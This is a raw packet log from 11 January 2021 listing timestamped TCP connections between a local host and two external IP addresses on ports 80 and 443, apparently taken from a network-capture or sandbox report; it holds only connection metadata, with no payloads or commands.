Jan 11, 2021 16:52:11.565789938 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.565794945 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.565831900 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.565845966 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.565875053 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.591700077 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.591748953 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.591788054 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.591799021 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.591804028 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.591841936 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.591845036 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.591886997 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.592273951 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.592314959 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.592327118 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.592351913 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.592364073 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.592389107 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.592401981 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.592434883 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.594166994 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.594206095 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.594240904 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.594244957 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.594266891 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.594283104 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.594295025 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.594342947 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.604407072 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.604460955 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.604496956 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.604501963 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.604540110 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.604541063 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.604554892 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.604587078 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.604635000 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.604674101 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.604681969 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.604712963 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.604718924 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.604752064 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.604765892 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.604790926 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.604796886 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.604827881 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.604840040 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.604865074 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.604876041 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.604911089 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.604912043 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.604954958 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.604959011 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.604991913 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.605005026 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.605030060 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.605041981 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.605067968 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.605074883 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.605114937 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.605729103 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.606501102 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.614857912 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.614913940 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.614931107 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.614959002 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.614965916 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.614996910 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.615009069 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.615036964 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.615076065 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.615082026 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.615108967 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.615115881 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.615123034 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.615164995 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.615165949 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.615209103 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.643332005 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.643385887 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.643400908 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.643424034 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.643435001 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.643460989 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.643465996 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.643507957 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.643507957 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.643549919 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.643558025 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.643587112 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.643600941 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.643625021 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.643631935 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.643663883 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.643667936 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.643699884 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.643711090 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.643738031 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.643750906 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.643778086 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.643795013 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.643824100 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.643825054 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.643866062 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.643870115 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.643903017 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.643908024 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.643940926 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.643944979 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.643989086 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.651149035 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.651993990 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.653496027 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.653542042 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.653582096 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.653932095 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.653971910 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.653971910 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.653984070 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.654010057 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.654015064 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.654047012 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.654052019 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.654083014 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.654088020 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.654119968 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.654124022 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.654158115 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.654161930 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.654191017 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.654198885 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.654208899 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.654249907 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.654251099 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.654285908 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.654289961 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.654323101 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.654325962 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.654361010 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.654364109 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.654396057 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.654409885 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.654436111 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.654452085 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.654481888 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.654592037 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.654632092 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.654637098 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.654680014 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.654890060 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.655641079 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.655680895 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.655706882 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.655716896 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.655731916 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.655762911 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.655783892 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.655821085 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.655834913 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.655858994 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.655869007 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.655903101 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.657246113 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.658008099 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.664169073 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.664208889 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.664247990 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.664268970 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.664284945 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.664314985 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.664339066 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.664345980 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.664350033 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.664352894 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.664355040 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.664391994 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.664402962 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.664428949 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.664441109 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.664474010 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.693073988 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.693126917 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.693175077 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.693217039 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.693253994 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.693272114 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.693293095 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.693324089 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.693330050 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.693357944 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.693367004 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.693403959 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.693416119 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.704256058 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.704308987 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.704349041 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.704365969 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.704385996 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.704389095 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.704427958 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.704435110 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.704435110 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.704477072 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.704484940 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.704514027 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.704530001 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.704551935 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.704555988 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.704591036 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.704602957 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.704627037 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.704643011 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.704664946 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.704678059 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.704703093 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.704721928 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.704749107 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.704751968 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.704793930 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.704801083 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.704829931 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.704868078 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.704870939 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.704879999 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.704905033 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.704917908 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.704941988 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.704957962 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.704979897 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.704982042 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.705017090 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.705029964 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.705064058 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.705066919 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.705105066 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.705118895 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.705142975 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.705168962 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.705180883 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.705197096 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.705221891 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.705245972 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.705260038 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.705267906 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.705313921 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.706041098 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.706146002 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.706204891 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.706217051 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.706269026 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.706886053 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.706928015 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.706940889 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.706964970 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.706973076 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.707012892 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.707016945 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.707063913 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.707241058 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.712136984 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.713637114 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.713709116 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.713726044 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.713747978 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.713768005 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.713790894 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.713798046 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.713829041 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.713846922 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.713871956 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.713875055 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.713917017 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.713921070 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.713953972 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.713962078 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.713990927 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.713996887 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.714029074 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.714032888 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.714066029 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.714071989 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.714103937 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.714107990 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.714140892 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.714147091 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.714186907 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.714193106 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.714229107 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.714246988 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.714266062 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.714272022 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.714303017 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.714317083 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.714339972 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.714351892 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.714375973 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.714401960 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.714413881 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.714417934 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.714449883 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.714457989 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.714490891 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.714497089 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.714538097 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.714541912 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.714574099 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.714591980 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.714611053 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.714615107 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.714648962 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.714654922 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.714684010 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.714709044 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.714721918 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.714730024 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.714759111 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.714766026 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.714801073 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.714807987 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.714850903 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.714864016 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.714886904 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.714890003 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.714926004 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:11.714934111 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:11.714970112 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:15.198544979 CET	49168	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:15.250614882 CET	443	49168	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:15.250715971 CET	49168	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:15.267879963 CET	49168	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:15.319593906 CET	443	49168	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:15.334491014 CET	443	49168	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:15.334590912 CET	49168	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:15.349116087 CET	49168	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:15.404347897 CET	443	49168	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:15.404663086 CET	49168	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:16.669056892 CET	80	49167	160.153.133.116	192.168.2.22
Jan 11, 2021 16:52:16.669213057 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:52:16.920098066 CET	80	49167	160.153.133.116	192.168.2.22
